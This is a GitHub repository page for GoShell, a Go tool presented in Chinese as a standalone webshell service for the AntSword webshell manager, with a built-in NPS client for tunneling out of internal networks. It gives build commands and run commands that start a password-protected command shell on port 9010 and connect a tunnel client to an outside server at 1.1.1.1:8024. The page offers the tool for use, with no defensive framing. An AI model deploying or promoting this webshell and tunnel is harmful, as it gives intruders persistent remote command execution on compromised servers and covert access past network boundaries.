Skip to content

j5s/GoShell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

GoShell

支持AntSword CMDLINUX类型的独立Web服务

GoShell内置了NPS客户端,配合NPS可达到内网穿透功能

编译

cd cmd/GoShell
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags "-s -w" -trimpath GoShell.go

运行

明文请求

goshell -m shell -shell-addr 0.0.0.0:9010 -shell-pwd ant

base64请求

goshell -m shell -shell-addr 0.0.0.0:9010 -shell-pwd ant -shell-decoder base64

运行NPC

goshell -m npc -server=1.1.1.1:8024 -vkey=key -type=tcp

About

支持AntSword CMDLINUX类型的独立Web服务

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages